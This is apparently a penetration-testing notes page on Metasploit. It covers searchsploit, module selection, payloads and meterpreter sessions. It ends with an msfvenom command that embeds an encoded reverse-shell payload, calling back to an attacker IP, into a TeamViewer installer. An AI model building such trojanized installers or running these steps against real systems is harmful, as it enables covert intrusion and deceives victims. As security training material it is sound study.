Metasploit

msfconsole

Find an exploitable service

First, we need to find an exploitable service on the machine. The enumeration phase should give us an idea of the services available on the target machine and we can investigate further using searchsploit. This is a command tool that searches exploit-db.com for relevant results.

searchsploit [terms]

For instance:

searchsploit proftp 1.2

Also a good idea to first update searchsploit references and exploit code with:

searchsploit -u

Metasploit

Launch Metasploit

msfconsole

Search for the exploit

You've found that there is an existing exploit for the service you're looking for, now you need to see if there is a Metasploit module for it

msf> search proftp

Select the module

You've found the module, select it to use it

msf> use [index]

Fill in the options

Now you'll need to look at the options and fill them in

msf> options
msf> set RHOSTS [target ip / host]

Continue through any required options on the module

Select Targets

Occasionally, you'll have more than one target available - you can see the target selections by using the show command

msf> show targets

Select the Payload

Now we need to select a payload to send with the exploit. Occasionally, one will be selected automatically and shown in the options command. However, this is generally a Staged Payload and may be unstable. To view available payloads, use the show command and select it with use

msf> set payload [tab to autocomplete]

Exploit

Time to run the exploit

msf> exploit

If the exploit is successful a meterpreter (or whatever type of payload shell you chose) will be spawned and you will be dropped into the shell

Meterpreter

Meterpreter is great, because it's a shell that's built into Metasploit and comes with many commands built in. You can also have multiple meterpreter sessions. You can background a session by using the background command inside of meterpreter. You can use the sessions command to view available sessions and select one to interact with

meterpreter> background
msf> sessions
msf> sessions -i 1

More information on meterpreter commands can be found here: https://www.offsec.com/metasploit-unleashed/meterpreter-basics/

Msfvenom

Creating payloads with various options built in, obfuscated and/or integrated into an existing executable can be done with msfvenom. The following command will create a payload with the following options:

payload: windows/x86/meterpreter_reverse_tcp
lhost: our machine ip
lport: our reverse shell port
-k tells msfvenom that we are going to proceed with normal execution after the payload detonates
-x is the existing executable to inject into
-e is the encoder to use for obfuscation
-a is the architecture of the victim machine
platform is the platform of the victim
-o is the output file
-i is the number of iterations for the encoder to loop

msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.15.8 LPORT=8080 -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5

PreviousPayloads NextManual Exploitation

Last updated 23 days ago